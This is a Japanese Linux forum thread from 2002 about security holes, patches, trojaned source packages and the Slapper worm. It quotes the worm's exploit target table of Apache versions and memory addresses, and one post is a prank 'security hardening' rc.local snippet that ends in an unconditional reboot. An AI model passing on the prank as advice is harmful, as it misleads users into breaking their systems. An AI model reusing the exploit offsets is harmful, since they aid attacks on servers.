imap のってかなり前から判明してて悪用ツールも出回ってるのに、
赤帽は無視状態なんだよなぁ。
135:login:Penguin
02/08/01 00:00 HYtIqah4.net
>>132
鷲もSolaris8(SPARC版)で同じようなエラーでまくった。
136:login:Penguin
02/08/01 04:58 K+qKORMj.net
>>132
FreeBSD 4.6-STABLEで同じエラーが出たが,
PlamoLinux 2.2.6では出なかった
137:135
02/08/01 05:03 K+qKORMj.net
ちなみに
FreeBSD:
-r-xr-xr-x 1 root wheel 29017 Sep 26 2000 /usr/bin/pod2man
Linux:
-rwxr-xr-x 1 root root 28830 Jul 23 1999 /usr/bin/pod2man*
138:OpenSSHにトロイ
02/08/02 00:12 INRnoZ0d.net
URLリンク(docs.freebsd.org)
139:132
02/08/02 11:13 ODee0oiA.net
ヨー分からんが、どうせマニュアルだしとおもって
とりあえず無視して続行した
情報あんがと>>134, 135
140:login:Penguin
02/08/02 11:37 Ybd6oZe9.net
>137
祭りのヨカーン
うちは大丈夫だったーよ。
141:名無しさん@Emacs
02/08/02 12:53 00MO2/Lt.net
>>137
祭りネタキタ━━━(゚∀゚)━━━ !!!!!
いや、うちは全く問題なかったんだけど。
いちおうcertのほうのリンクも。
URLリンク(www.cert.org)
142:login:Penguin
02/08/02 13:02 1fOWog9y.net
因紫 掻
薄仙 尻衣馬形壱 馬澗 紫戚闘拭 奄沙 凪戚走亜 蒸柔艦陥. 穣益傾戚球馬澗 掻析 呪 赤柔艦陥.
陥製拭 陥獣 背左淑獣神. 庚薦亜 域紗鞠檎 瀬 紫戚闘 淫軒切拭惟 庚税馬淑獣神.
これってなんて書いてあるの?ルータのログみたら外からローカルの
アドレス参照しようとしてたみたいなんだけど。
143:141
02/08/02 13:03 1fOWog9y.net
参照元のURL見に行ったら書いてあった。
144:login:Penguin
02/08/02 20:01 8Z+yUGrL.net
キタ━━━(゚∀゚)━━━ !!!!!
sunrpc にリモートな穴
URLリンク(www.isskk.co.jp)
glibcおそらくダメ。パッチ前のコードとおんなじ。
145:login:Penguin
02/08/02 20:07 8Z+yUGrL.net
cvsは変更されている。
146:login:Penguin
02/08/02 20:42 Fjm5fo+C.net
>>143
俺的にはネットに sunrpc を露出させてる事自体が非常識だと思うが、
実際にはそういう鯖がいっぱいあるんだろうな。
Debian ですらデフォルトで sunrpc が動いてる。
147:login:Penguin
02/08/03 22:31 iNHan/6D.net
>>145
libwrap組み込みのportmapperはまだマシ。
Solarisのやつはアクセス制限ないからね
148:login:Penguin
02/08/03 22:43 iYyATlBv.net
>>145
ルータで塞いでるから、ネットに晒してるのはあまり無い気がするが、
それでも内部からだと叩かれまくるよな。
149:login:Penguin
02/08/03 23:03 q+uK3qOu.net
�
150:Kーソ。NFS鯖もだめっぽ?
151:login:Penguin
02/08/04 02:40 mTLJthdl.net
Port111、iptablesでrejectしとこっと
152:login:Penguin
02/08/08 08:04 GKTZUhh4.net
08/07 Vine-errata security hole
apache-1.3.26-0vl3.i386.rpm
apache-devel-1.3.26-0vl3.i386.rpm
apache-manual-1.3.26-0vl3.i386.rpm
mod_ssl-2.8.7-0vl3.i386.rpm
153:login:Penguin
02/08/08 08:06 GKTZUhh4.net
08/07 Vine-errata security hole
libpng-1.0.12-0vl3.i386.rpm
libpng-devel-1.0.12-0vl3.i386.rpm
154:OpenSSL0.9.6f
02/08/09 14:31 BghTOrfj.net
キタ━━━(゚∀゚)━━━ !!!!!
URLリンク(www.openssl.org)
155:あぼーん
あぼーん.net
あぼーん
156:login:Penguin
02/08/09 14:59 4tlTdlJW.net
>>152
またopensslに依存するのをビルドしなおしかよ・・メンドクセー
157:OpenSSL0.9.6f
02/08/09 15:10 BghTOrfj.net
>>154
朝からWin2kのSP3(板違いスマソ)もいれたし、
次はコレかよって感じだよ....ウワヮヮン ヽ(`Д´)ノ
158:名無しさん@XEmacs
02/08/09 15:19 QtBVDpro.net
あうん。 OpenSSL は、ちと面倒だよね。。。
159:login:Penguin
02/08/09 15:21 8WrLJci1.net
make installでコケるぞ。0.9.6g出んのかな
URLリンク(marc.theaimsgroup.com)
160:
02/08/09 19:13 o+8My8IY.net
カンプールのインド工科大学のManindra Agrawal、Neeraj KayalおよびNitin Saxenaが、
素数判定を多項式時間(polynomial time)で可能なアルゴリズムを発見、証明した。
素数判定(が困難であること)は、RSAをはじめとする多くのコンピュータ暗号が安全である
ことを保障しているため、もしこれが事実であった場合、コンピュータ暗号の世界に多大な
影響を及ぼすと予想される。
論文は以下のURLからたどることができる。
また、ニューヨークタイムズの記事によると、ベル研のDr. Carl Pomerance博士は
この論文を正確(correct)であると断定し、「このアルゴリズムは美しい。」
("This algorithm is beautiful.")とコメントしたという。
論文のURL(英語: 数学者の写真あり): URLリンク(www.cse.iitk.ac.in)
NY Timesの記事(英語): URLリンク(www.nytimes.com)
関連スレ
【科学】素数判定が多項式時間で可能、コンピュータ暗号に影響大―インドの数学者証明
スレリンク(newsplus板)
素数判定は「決定的」多項式時間で可能
スレリンク(math板)
もうだめぽ、、
161:login:Penguin
02/08/09 19:23 8xcqN05M.net
地味なタコ式祭りが発生しているが... 当面 RSA には影響なさげ。
162:login:Penguin
02/08/09 19:27 8xcqN05M.net
>素数判定(が困難であること)は、RSAをはじめとする...
RSA の基盤は「素因数分解(が困難であること)」だバカモノ。
163:login:Penguin
02/08/09 19:44 o+8My8IY.net
>>160
素数判定は楽にできるようになったけど、
依然として素因数分解は困難であるということ?
164:login:Penguin
02/08/09 19:49 8xcqN05M.net
>>161
アルゴリズムを素因数分解に応用できるかどうかは今の所未知数。
ていうか今のところ関係無し。でも数学好きにはたまらんネタだろうな。
165:login:Penguin
02/08/09 21:03 o+8My8IY.net
>>162
ども。
とりあえず、あわてることはなさそうですね。
166:login:Penguin
02/08/10 08:00 nkdobe6F.net
こういう時数学的素養がない漏れはツライ...
167:login:Penguin
02/08/11 00:52 Bp+ly3tB.net
8月中に色々出そうなヨカーン
168:login:Penguin
02/08/11 05:59 cqQ7h8Qr.net
opensslは0.9.6gか・・・
この手のライブラリは頻繁にバージョンアップされたら泣けてくる・・・
今、0.9.6e使ってるんだけど、セキュリティ問題あんのかな?
うちではbuildは素直に通ったんだけど・・・これ絡みの修正なら放置したい・・・
169:login:Penguin
02/08/11 08:43 uKejT2NS.net
>>166
openssl 0.9.6eはバグ入りです。これあてないと駄目。なんで0.9.6fとか openssl advisoryが出ないのか不思議です。
URLリンク(marc.theaimsgroup.com)
セキュリティーホールmemoから引用
170:166
02/08/11 15:42 cqQ7h8Qr.net
>>167
THX
アップデートしておいた方がよさげかな(泣
171:login:Penguin
02/08/12 10:36 /vXwCwY1.net
これって 6.2 も BIND 9.x に上げろ、ってこと?
URLリンク(rhn.redhat.com)
172:login:Penguin
02/08/12 11:41 9+/01gLs.net
もう、openssl0.9.6gでてるよ。
opensshとかapacheとか、makeしなおしかよー
173:login:Penguin
02/08/12 14:32 CpjzB4Ow.net
>>170
スタティックリンクしてるのか?
174:login:Penguin
02/08/12 15:28 9+/01gLs.net
sharedでmakeしてるときって、再起動だけでいいんですか?
ldd /usr/sbin/sshd
してみたら、
libcrypto.so.3 => /usr/lib/libcrypto.so.3 (0x280d0000)
という風になってて、
このlibcrypto.so.3 は古いライブラリだったんですよね。
新しいのは
libcrypto.so.2
なんですけど・・・・
175:login:Penguin
02/08/12 16:38 e6gR74Zh.net
海胆板とクロスポストかよ おめでてえな
176:login:Penguin
02/08/13 22:00 Lm+jD2sp.net
>>171
お前馬鹿だなぁ。ダイナミックリンクでも新しいバージョン入れて再起動しないとダメだよ。
177:login:Penguin
02/08/13 23:10 OgpeoNS6.net
>>172
入れ換えて再起動するだけでいい。そのためのシェアードライブラリ。
そのへんがよく判ってない人は RPM に頼るほうが安全だよ。
178:login:Penguin
02/08/13 23:49 HzHkL5P0.net
rpm だと, シェアードライブラリを入れ変えると, link してる
daemon を再起動してくれるもんなの? なんかすごそう.
179:login:Penguin
02/08/13 23:53 42AXx8EM.net
>>176
してくれないんでない?
OpenSSL の Advisory では「リブートしろ」って書いてある。
URLリンク(rhn.redhat.com)
180:login:Penguin
02/08/14 00:33 zJGAdpS8.net
>>176 いや、そこまではやってくれないよ。
シェアードにしたつもりで出来てなかった、とかの失敗が無くなるだけ。
それに >>177 が書いてるように、アドバイザリに必要な作業が載る。
でも Debian で glibc 入れ換えると片っ端から再起動してくれて驚く。
181:login:Penguin
02/08/14 07:06 s4Wd/65X.net
>178
/sbin/init も?
182:login:Penguin
02/08/14 11:21 xh4yp2uP.net
>>179 Debian で /sbin/init を再起動してくれるかどうかは確かめてない。
でも赤帽でも init は再起動してくれるくらいだから、やってるんじゃない?
183:login:Penguin
02/08/18 01:02 dpWasehA.net
>>179
postinst で init u してるのを発見
184:login:Penguin
02/08/25 02:51 u07j5rfK.net
08/15 Vine-errata security hole
mozilla-1.0.0-9vl9.i386.rpm
mozilla-chat-1.0.0-9vl9.i386.rpm
mozilla-devel-1.0.0-9vl9.i386.rpm
mozilla-dom-inspector-1.0.0-9vl9.i386.rpm
mozilla-js-debugger-1.0.0-9vl9.i386.rpm
mozilla-mail-1.0.0-9vl9.i386.rpm
mozilla-nspr-1.0.0-9vl9.i386.rpm
mozilla-nspr-devel-1.0.0-9vl9.i386.rpm
mozilla-nss-1.0.0-9vl9.i386.rpm
mozilla-nss-devel-1.0.0-9vl9.i386.rpm
mozilla-psm-1.0.0-9vl9.i386.rpm
185:login:Penguin
02/08/25 02:51 u07j5rfK.net
08/25 Vine-errata security hole
util-linux-2.11n-4vl6.i386.rpm
mount-2.11n-4vl6.i386.rpm
losetup-2.11n-4vl6.i386.rpm
186:login:Penguin
02/08/26 23:12 8KXm86HS.net
>>181
なるほど。
Red Hat だと glibc に付属の glibc_post_upgrad
187:e を実行してたよ。
188:login:Penguin
02/08/29 11:09 9F1pybQo.net
古いので sage
URLリンク(service.real.com)
URLリンク(service.real.com)
189:login:Penguin
02/09/14 13:13 B9dlUKMe.net
Linux.Slapper.Worm
URLリンク(slashdot.jp)
190:4も学割野朗 ◆4GET/.F.
02/09/14 23:20 jwopavyL.net
URLリンク(www.zakzak.co.jp)
俺にとっては他人事じゃなかったりするわけだが。
191:4も学割野朗 ◆4GET/.F.
02/09/14 23:22 jwopavyL.net
間違えた。こっちが正しい。
URLリンク(www.zakzak.co.jp)
知らない間にNASAにハッキング…
愛知の会社員になりすまして攻撃
愛知県知立市の会社員(31)が自宅で所有するパソコンが8月、ケーブルテレビ局のインターネット回線を経由して
何者かに勝手に遠隔操作され、米航空宇宙局(NASA)の施設「ジェット推進研究所」のコンピューターにハッカー攻撃をしていたことが14日までに分かった。
192:login:Penguin
02/09/14 23:24 xbXyt3h1.net
これって、UNIX系OS入れてたってことなのかな?
それとも、Win2000?
193:4も学割野朗 ◆4GET/.F.
02/09/14 23:26 jwopavyL.net
>>189 ウィンやマックじゃないって書いてあるからUNIX系だと思われ。
194:login:Penguin
02/09/14 23:35 xbXyt3h1.net
>>190
さんくす。
朝日の記事しか読んでなかった。zakuzakuには書いてあったんだね。
195:login:Penguin
02/09/15 00:03 s5g/JVKr.net
おまえらはそもそも軽く考えてサーバ建てすぎ。
まぁこのスレに来る連中はまだいいほうだな。
少なくとも「セキュリティ」という単語を知ってる。
196:login:Penguin
02/09/15 00:10 /sdc7+j+.net
>>192
鯖は建てましたがワールドワイドには繋いでません。
197:CRYPTO-GRAM, September 15
02/09/16 17:43 qCuGZIi/.net
AES may have been broken. Serpent, too.
198:login:Penguin
02/09/17 10:46 FczQ6EGn.net
Linuxサーバを襲う新手のワーム
URLリンク(www.zdnet.co.jp)
199:login:Penguin
02/09/17 11:07 f9VI4nxX.net
>>195
それがまるっきり来ないんだよ。TCP 443 を叩いてもくれない。
既に絶滅したかも。来るのは MS SQL のワームばかり。
200:login:Penguin
02/09/17 11:32 FczQ6EGn.net
だよな。普通にアップデートしていたら穴は塞がってるし。
漏れもくだ質のヤツしか見た事無い。
スレリンク(linux板:386番)
201:login:Penguin
02/09/17 13:18 e3Zfg2Kx.net
最近、https 公開していないサーバに 2 回ほど
443/tcp アクセスがあったよ。まだ Worm は知ら
なかったから(゜Д゜)ハァ? と思ったけど。
9/13 17:05:20 と 9/14 19:17:00 に 1 回ずつ
SYN が来てた。
1433/tcp に埋もれて見落しそうになる(w
202:from bugtraq.c
02/09/17 14:42 f9VI4nxX.net
オリジナルの Slapper のターゲット。
struct archs {
char *os;
char *apache;
int func_addr;
} architectures[] = {
{"Gentoo", "", 0x08086c34},
{"Debian", "1.3.26", 0x080863cc},
{"Red-Hat", "1.3.6", 0x080707ec},
{"Red-Hat", "1.3.9", 0x0808ccc4},
{"Red-Hat", "1.3.12", 0x0808f614},
{"Red-Hat", "1.3.12", 0x0809251c},
{"Red-Hat", "1.3.19", 0x0809af8c},
{"Red-Hat", "1.3.20", 0x080994d4},
{"Red-Hat", "1.3.26", 0x08161c14},
{"Red-Hat", "1.3.23", 0x0808528c},
{"Red-Hat", "1.3.22", 0x0808400c},
{"SuSE", "1.3.12", 0x0809f54c},
{"SuSE", "1.3.17", 0x08099984},
{"SuSE", "1.3.19", 0x08099ec8},
{"SuSE", "1.3.20", 0x08099da8},
{"SuSE", "1.3.23", 0x08086168},
{"SuSE", "1.3.23", 0x080861c8},
{"Mandrake", "1.3.14", 0x0809d6c4},
{"Mandrake", "1.3.19", 0x0809ea98},
{"Mandrake", "1.3.20", 0x0809e97c},
{"Mandrake", "1.3.23", 0x08086580},
{"Slackware", "1.3.26", 0x083d37fc},
{"Slackware", "1.3.26",0x080b2100}
};
203:login:Penguin
02/09/17 16:23 Noq0z9Is.net
>>198
9/14が最初で毎日2~3回づつ来てるよ。
204:login:Penguin
02/09/17 16:34 f9VI4nxX.net
>>200
アドレスのスキャン方法によって来る IP と来ない IP があるのかな?
205:login:Penguin
02/09/18 19:16 V7u05Yz6.net
>>201
まず 80 番にアクセスして対象となる Apache を探す。
だから 443 にはアクセスが無い事もある。
GET / HTTP/1.1 してすぐに逃げてく奴が妖しい。
基本的にこないだの Apache のワームの改造版らしいね。
206:
02/09/22 02:03 0Va9RvOb.net
RSAよりも強固な楕円暗号のフリーソースがたしかサンから放出される
という噂を聞いたが、それは取り込まれるのかな?
207:login:Penguin
02/09/22 02:37 fw5votXq.net
>>203
Linuxに取り込むことは無いだろうが、OpenSSLにはすでに提供済みとのこと。
じきにOpenSSHやGPGなどに取り込まれるじゃないかな?
208:名無しさん@Meadow
02/09/22 02:59 v9Q7KCox.net
これね。
URLリンク(japan.cnet.com)
OpenSSLで使われるならBSDライセンスになるでしょ。
なら、GPLで汚染することも可能(藁。
209:login:Penguin
02/09/22 03:01 3+1dfxia.net
>>199
じゃ、ここらへん偽っとくと、昆虫採集できるの?
210:login:Penguin
02/09/22 03:09 lAUJfl5L.net
RedHat7.3を使ってWEBサーバにしています。
セキュリティ対策として
・毎日一回up2date実行
・IPTABLES
・snort
・tripwire
をしています。
ほかに導入すべきソフトや対策あったら教えていただけますでしょうか。
211:login:Penguin
02/09/22 15:30 ZMoD+eSk.net
>>207
ログの監視は必須。これは一番最初にやるべき事だ。
必要ないプログラムを止め、削除する。不用な Apache のモジュールも。
確実に信用できる奴以外はログインさせない、アカウントを作らない。
サーバへのログイン、管理は SSH や SSL 等、盗聴に強いものを使う。
あとはサーバ自身より中味の問題。
CGI 等の Web アプリケーションに注意すべきだ。非常に穴が多い。
どこからか拾って来た CGI スクリプトは決してインストールしない。
クロスサイトスクリプティング脆弱性についても注意が必要だ。
こんなもんだろ。
もっとやりたいパラノイア君には、他にも出来る事が沢山ある。
ピアソンの「Linux セキュリティトータルガイド」一読を薦める。
212:login:Penguin
02/09/22 15:49 ZMoD+eSk.net
>>206 絶滅危惧種だから天然ものは簡単には捕まらないぞ。
213:login:Penguin
02/09/22 17:24 oJW7ac5g.net
>>209
なんだ、養殖モノしか捕まらないのか...
(´・ω・)ショボーン
214:login:Penguin
02/09/26 16:12 Q23MY6o0.net
最新版であるxfree86 4.2.1までのバージョンで
libX11.soライブラリの脆弱性によって
215:ローカルユーザーに任意のプログラムを実行される可能性がある http://www.xfree86.org/security/
216:login:Penguin
02/09/26 16:18 pqbC9pgT.net
>>211
それって suid root の X クライアントが無いと悪用不可能な気がする。
217:login:Penguin
02/09/27 01:41 lhdC2Dp9.net
>>212
xtermはしっかりsuid root。
218:login:Penguin
02/10/03 01:04 OsvGBspG.net
10/03 Vine-errata security hole
postgresql-7.2.2-0vl3.i386.rpm
postgresql-contrib-7.2.2-0vl3.i386.rpm
postgresql-devel-7.2.2-0vl3.i386.rpm
postgresql-docs-7.2.2-0vl3.i386.rpm
postgresql-jdbc-7.2.2-0vl3.i386.rpm
postgresql-libs-7.2.2-0vl3.i386.rpm
postgresql-odbc-7.2.2-0vl3.i386.rpm
postgresql-perl-7.2.2-0vl3.i386.rpm
postgresql-python-7.2.2-0vl3.i386.rpm
postgresql-server-7.2.2-0vl3.i386.rpm
postgresql-tcl-7.2.2-0vl3.i386.rpm
postgresql-tk-7.2.2-0vl3.i386.rpm
219:login:Penguin
02/10/03 01:05 OsvGBspG.net
10/03 Vine-errata security hole
namazu-2.0.12-0vl1.i386.rpm
namazu-devel-2.0.12-0vl1.i386.rpm
220:login:Penguin
02/10/03 01:05 OsvGBspG.net
10/03 Vine-errata security hole
XFree86-4.2.1-0vl4.i386.rpm
XFree86-100dpi-fonts-4.2.1-0vl4.i386.rpm
XFree86-75dpi-fonts-4.2.1-0vl4.i386.rpm
XFree86-Xnest-4.2.1-0vl4.i386.rpm
XFree86-Xvfb-4.2.1-0vl4.i386.rpm
XFree86-cyrillic-fonts-4.2.1-0vl4.i386.rpm
XFree86-devel-4.2.1-0vl4.i386.rpm
XFree86-doc-4.2.1-0vl4.i386.rpm
XFree86-gl-4.2.1-0vl4.i386.rpm
XFree86-gl-devel-4.2.1-0vl4.i386.rpm
XFree86-legacy-4.2.1-0vl4.i386.rpm
XFree86-libs-4.2.1-0vl4.i386.rpm
XFree86-tools-4.2.1-0vl4.i386.rpm
XFree86-twm-4.2.1-0vl4.i386.rpm
XFree86-xdm-4.2.1-0vl4.i386.rpm
XFree86-xf86cfg-4.2.1-0vl4.i386.rpm
XFree86-xfs-4.2.1-0vl4.i386.rpm
221:login:Penguin
02/10/03 01:05 OsvGBspG.net
10/03 Vine-errata security hole
python-1.5.2-28vl4.i386.rpm
python-devel-1.5.2-28vl4.i386.rpm
python-docs-1.5.2-28vl4.i386.rpm
python-tools-1.5.2-28vl4.i386.rpm
tkinter-1.5.2-28vl4.i386.rpm
222:login:Penguin
02/10/03 01:06 OsvGBspG.net
10/03 Vine-errata security hole
xchat-1.8.10-0vl1.i386.rpm
223:login:Penguin
02/10/03 01:12 T2cHE8PV.net
>>213
それは古い常識。
224:login:Penguin
02/10/06 15:38 kqhyD1Co.net
数日前にでた Red Hat の glibc アップデート
URLリンク(rhn.redhat.com)
を当てると、MySQL が死ぬ事があるらしいぞ。
URLリンク(bugzilla.redhat.com)
225:login:Penguin
02/10/09 16:59 GCLBywcm.net
Sendmailにトロイが仕込まれてたそうな。
URLリンク(www.cert.org)
226:login:Penguin
02/10/12 22:59 AS/1mqsd.net
mainte
227:login:Penguin
02/10/14 13:03 Yr4D9drm.net
セキュリティを強化するために以下の行を
/etc/rc.d/rc.localに追加してください
eject
eject -t
eject
eject -t
eject
eject -t
eject
echo "ご苦労"
reboot
228:openssh3.5age
02/10/15 03:19 OdSSQrkP.net
しかし、こうトロイが続くと心配になるな・・・
make前にソース読むしかないのか?
229:login:Penguin
02/10/19 11:04 8jgklp6v.net
お前ら、アンチウイルスソフトでSophos以外で
個人利用が無料のものはありますか。
230:login:Penguin
02/10/21 11:00 geoyITgp.net
あるよ。
231:login:Penguin
02/10/22 23:32 v1mpEmk/.net
>>225
うんこしないよ
232:login:Penguin
02/10/23 13:33 9clkFO2S.net
10/23 Vine-errata security hole
webmin-1.000-1vl3.noarch.rpm
233:login:Penguin
02/10/23 15:35 W0Y2GjXD.net
>皆様、セキュリティホールは埋めとけよ
ってことは>>1生き埋めですか・・・?
234:login:Penguin
02/10/23 16:13 ZfPnlnd+.net
>>229
ごめん、どういう意味?
235:login:Penguin
02/10/27 19:03 DEU6FCX+.net
10/27 Vine-errata security hole
webmin-1.000-1vl5.noarch.rpm
236:login:Penguin
02/10/27 19:06 oH46f0cH.net
「彼女のセキュリティホールがゆるい」が
埋められてしまったのを思い出したよ。。。
237:login:Penguin
02/10/31 19:53 tNyCeh9o.net
10/31 Vine-errata security hole
mozilla-1.1-0vl6.i386.rpm
mozilla-chat-1.1-0vl6.i386.rpm
mozilla-devel-1.1-0vl6.i386.rpm
mozilla-dom-inspector-1.1-0vl6.i386.rpm
mozilla-js-debugger-1.1-0vl6.i386.rpm
mozilla-mail-1.1-0vl6.i386.rpm
mozilla-nspr-1.1-0vl6.i386.rpm
mozilla-nspr-devel-1.1-0vl6.i386.rpm
mozilla-nss-1.1-0vl6.i386.rpm
mozilla-nss-devel-1.1-0vl6.i386.rpm
mozilla-psm-1.1-0vl6.i386.rpm
238:login:Penguin
02/11/01 10:17 oNzk19D1.net
11/1 Vine-errata security hole
2.5/{i386,ppc,alpha}
unzip-5.50-4vl1.i386.rpm
unzip-5.50-4vl1.ppc.rpm
unzip-5.50-4vl1.alpha.rpm
2.5/{i386,ppc,alpha} 2.6/{i386,ppc,alpha}
tar-1.13.25-8vl3.i386.rpm
tar-1.13.25-8vl3.ppc.rpm
tar-1.13.25-8vl3.alpha.rpm
239:login:Penguin
02/11/11 22:18 lWjYmx1J.net
またglibc入れ替えでつか・・
URLリンク(www.kb.cert.org)
240:login:Penguin
02/11/12 19:35 IbLfzr3s.net
Vine Linux 2.5/2.6 向け
・2002,11,12 XFree86 のメモリリーク修正、ドライバ更新 [2.6/{i386,ppc}]
・2002,11,12 kernel のバグ修正 [2.6/{i386
241:}] ・2002,11,12 apache, mod_ssl にセキュリティホール [2.5/{i386,ppc,alpha} 2.6/{i386,ppc,alpha}] ・2002,11,12 openssl にセキュリティホール [2.5/{i386,ppc,alpha}] ・2002,11,12 gv にセキュリティホール [2.5/{i386,ppc} 2.6/{i386,ppc}]
242:login:Penguin
02/11/14 11:04 hDcsnf62.net
11/14 Vine-errata security hole
WindowMaker-0.80.2-0vl1.i386.rpm
WindowMaker-libs-0.80.2-0vl1.i386.rpm
WindowMaker-devel-0.80.2-0vl1.i386.rpm
(´・ω・`)ショボーン
243:login:Penguin
02/11/14 15:43 h0BBp4h4.net
bind のパッチリリース age
244:login:Penguin
02/11/14 17:24 1qJgRtJZ.net
URLリンク(online.securityfocus.com)
よりによって libpcap に仕込むとはねぇ...(((;゚Д゚))ガクガクブルブル
245:login:Penguin
02/11/14 20:45 M1eCryy5.net
11/14 Vine-errata security hole
glibc-2.2.4-14vl12.i386.rpm
glibc-common-2.2.4-14vl12.i386.rpm
glibc-devel-2.2.4-14vl12.i386.rpm
glibc-profile-2.2.4-14vl12.i386.rpm
nscd-2.2.4-14vl12.i386.rpm
caching-nameserver-7.1-3vl3.noarch.rpm
246:login:Penguin
02/11/15 06:01 jZlgoDm5.net
11/15 Vine-errata security hole
bind-8.3.1-0vl2.i386.rpm
bind-devel-8.3.1-0vl2.i386.rpm
bind-utils-8.3.1-0vl2.i386.rpm
247:login:Penguin
02/11/20 01:55 GUhnBobE.net
URLリンク(www.zdnet.co.jp)
> インターネット・セキュリティ・システムズ(ISS)の勧告とは裏腹に、さ
>まざまな「アンダーグラウンド」グループが、少なくとも8月の時点でこの脆
>弱性を認識していた。筆者が初めてそれを知ったのも、最初の侵入が話題に
>なった8月のことである。
マ ジ で す か ?
248:login:Penguin
02/11/20 04:56 9HGeMWU7.net
>>1-242
OpenBSD 3.2-Stable版をインストールする事で一件落着!!!
--------------------キリトリセン--------------------
249:login:Penguin
02/11/20 05:21 Qb2RCDyv.net
>>243
OpenBSD のデフォルトの設定がいくら堅くても、その後の
設定をミスれば、簡単にセキュリティを弱くできるので、盲信じゃ、
やめた方がいいじゃろう。
少なくとも、他のディストリとか BSD や Solaris などの穴は、
見ておくべき。
250:login:Penguin
02/11/20 05:44 9HGeMWU7.net
>盲信じゃ、やめた方がいいじゃろう。
「盲者じゃ」という前置きが無ければね。
まあ、設定ミスるアホは使うなという事だな。
ミスりたくなければ、Win2kでも使ってりゃ良いだろ。
251:login:Penguin
02/11/20 08:54 C2HbeHa3.net
( ´_ゝ`)フーン
252:login:Penguin
02/11/21 18:21 4zefnMwe.net
D J B を 使 え
253:login:Penguin
02/11/23 19:27 5gG5Oc4E.net
11/23 Vine-errata security hole
kernel-2.4.19-0vl26.i386.rpm
kernel-2.4.19-0vl26.i586.rpm
kernel-2.4.19-0vl26.i686.rpm
kernel-BOOT-2.4.19-0vl26.i386.rpm
kernel-doc-2.4.19-0vl26.i386.rpm
kernel-headers-2.4.19-0vl26.i386.rpm
kernel-smp-2.4.19-0vl26.i386.rpm
kernel-smp-2.4.19-0vl26.i586.rpm
kernel-smp-2.4.19-0vl26.i686.rpm
kernel-source-2.4.19-0vl26.i386.rpm
254:login:Penguin
02/11/26 10:06 ntT13pIS.net
New kernel 2.2 packages fix local denial of service issue
URLリンク(rhn.redhat.com)
> The kernel in Red Hat Linux 6.2 and 7 is vulnerable to
> a local denial of service attack.
255:login:Penguin
02/11/28 01:35 fshFu6y3.net
11/27 Vine-errata security hole
w3m-0.3.2.1-0vl0.26.i386.rpm
256:login:Penguin
02/11/30 11:04 VjhBJ/BI.net
「もっともセキュリティが弱いOSはLinux,Aberdeen Groupがレポート」
URLリンク(itpro.nikkeibp.co.jp)
257:login:Penguin
02/12/02 10:37 oTqt5iDH.net
Canna3.6p1 キタ━━(゚∀゚)━━ッ!!
> Canna 3.6p1をリリースしました(2002/12/02)。
> これはセキュリティ修正のみを行ったリリースです。
258:login:Penguin
02/12/02 11:53 Zdu7sQxg.net
12/02 Vine-errata security hole
Canna-3.6p1-0vl1.i386.rpm
Canna-devel-3.6p1-0vl1.i386.rpm
libcanna-3.6p1-0vl1.i386.rpm
259:login:Penguin
02/12/02 13:53 XGmmgIbl.net
>>251
やたらとあちこちのリナスレに書き込まれてるけど、
1 普通の人がセキュリティに関する意識高揚のため�
260:ノ貼っている 2 リナ信者が$のアホっぷりをさらずために貼っている 3 何らかの理由によりリナに恨みを抱いている、あるいは 窓でちょっとばかりの知識にしがみついた人が リナを見下したくて貼っている どれなんでしょう?
261:login:Penguin
02/12/02 17:33 Xof3jkhf.net
>>243
>>243
デフォールト設定がOpenBSDよりも固いOSは、今ではいくらでもあるぞ。
OpenBSDの登場当初は確かに、デフォールト設定が最もセキュアなOSだった
けど、その思想が広まった今では、どちらかといういうと、デフォールト設定
が甘いOSになっちゃったんじゃないの? いまだにデフォールトでsshdを起動
しておくなんて正気とは思えん (OpenSSH のサーバー側に、ここ2年でいくつ
remote hole が見つかったのやら...)。それとも、OpenBSD の最新版では
sshd やら portmap やらを起動しなくなったの?
262:login:Penguin
02/12/02 21:53 /tJs03oT.net
> 窓でちょっとばかりの知識にしがみついた人が
誰か、和訳してくれ。
263:login:Penguin
02/12/03 00:41 dM/xGgbt.net
12/03 Vine-errata security fix
glibc-2.2.4-14vl13.i386.rpm
glibc-common-2.2.4-14vl13.i386.rpm
glibc-devel-2.2.4-14vl13.i386.rpm
glibc-profile-2.2.4-14vl13.i386.rpm
nscd-2.2.4-14vl13.i386.rpm
264:255
02/12/03 11:29 YEO1uHIX.net
>>256
和訳
窓でソフトウェアのインストールができるようになりました
窓でインターネットの設定ができます
窓パソコンを自作できます
VC++使って開発をやっています
窓で毎日2時間チャットをやってます
Linux?ああ、あのオタ向けのOSですね。(使ったことはない)
Linux?対応する周辺機器、ソフトが少なくて使い物になりませんよ
Linux?インストールだけで苦労して後は使い物にならないダメOSでしょ
な感じかなー?今までの経験からして。
265:login:Penguin
02/12/03 11:38 vfqO2k1x.net
>>256
原文:
窓でちょっとばかりの知識にしがみついた人が
リナを見下したくて貼っている
和訳:
セキュリティ面で色々言われていたWindowsユーザーが、
ここぞとばかりにLinuxを見下したくて貼っている。
(ついでにWindowsは設定が簡単なので、Windowsユーザーは知識が乏しい
と言ってみるテスト)
266:255
02/12/03 11:49 YEO1uHIX.net
>>259
あぁ、そう言ってしまうと身も蓋もないから避けてたのになぁ。(^_^;)
267:254
02/12/03 11:50 YEO1uHIX.net
(×)255
(○)254
268:sage
02/12/05 00:29 2ZCfTFxe.net
> Linux?ああ、あのオタ向けのOSですね。(使ったことはない)
ま、プロ向けかアマ向けか、ちゅーことですな。
本当のプロは商用Unixでがっぽり稼ぐ、いう話もあるが。
269:login:Penguin
02/12/05 00:30 2ZCfTFxe.net
ああ、またやってもた。
俺ってバカ。
270:login:Penguin
02/12/05 01:40 X2AKkBXQ.net
>>262 氏ね
271:login:Penguin
02/12/07 13:52 jYK9D6LS.net
BSD:東工,慶応矢上,奈良
Linux:会津
272:login:Penguin
02/12/11 03:43 9SlxkTcQ.net
12/10 Vine-errata security hole
w3m-0.3.2.2-0vl0.26.i386.rpm
273:login:Penguin
02/12/15 16:56 VmqacBB3.net
URLリンク(www.phatlinux.com)
phat linux逝った?
274:login:Penguin
02/12/18 02:10 tuH8qVMB.net
fURLリンク(ftp.openssl.org)
openssl-0.9.6h.tar.gz
何だ?openssl-0.9.6h.BOGUS.tar.gz ってのは。
275:login:Penguin
02/12/18 02:49 ogHzpI80.net
>>268
diff とってみ。
276:login:Penguin
02/12/18 15:54 IsAGpRc0.net
ってか、patch置いてあるし。
しかもバージョン番号age忘れただけという・・・。
277:login:Penguin
03/01/09 02:43 X6ogbEfM.net
おなまえをいちいち考えなくていいからfusianasanっていいよね♪
最初ね、かぶっちゃったこともあったしでもあいぴーっていうのはかぶらないんだね♪
